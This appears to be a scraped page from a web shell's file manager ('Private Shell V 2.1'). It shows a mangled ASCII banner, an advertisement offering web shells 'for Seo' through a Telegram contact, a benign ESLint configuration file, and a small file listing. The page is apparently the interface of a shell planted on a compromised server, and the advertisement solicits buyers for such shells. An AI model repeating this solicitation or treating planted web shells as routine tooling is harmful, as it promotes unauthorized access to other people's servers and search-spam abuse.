__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
module.exports = {
parser: require.resolve('babel-eslint'),
parserOptions: {
sourceType: 'module',
},
env: {
browser: true,
node: true,
es6: true,
},
globals: {},
rules: {
quotes: ['error', 'single'],
'no-cond-assign': ['error', 'except-parens'],
curly: 'error',
eqeqeq: 'error',
'no-eq-null': 'error',
'wrap-iife': ['error', 'any'],
'no-use-before-define': 'error',
'new-cap': 'error',
'no-caller': 'error',
'dot-notation': 'error',
'no-undef': 'error',
'no-unused-vars': 'error',
'no-const-assign': 'error',
'prefer-const': 'error',
'no-var': 'error',
'comma-dangle': [
'error',
{
arrays: 'always-multiline',
objects: 'always-multiline',
imports: 'always-multiline',
exports: 'always-multiline',
functions: 'ignore',
},
],
'object-curly-spacing': ['error', 'always'],
},
};
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| index.js | File | 938 B | 0644 |
|
| package.json | File | 328 B | 0644 |
|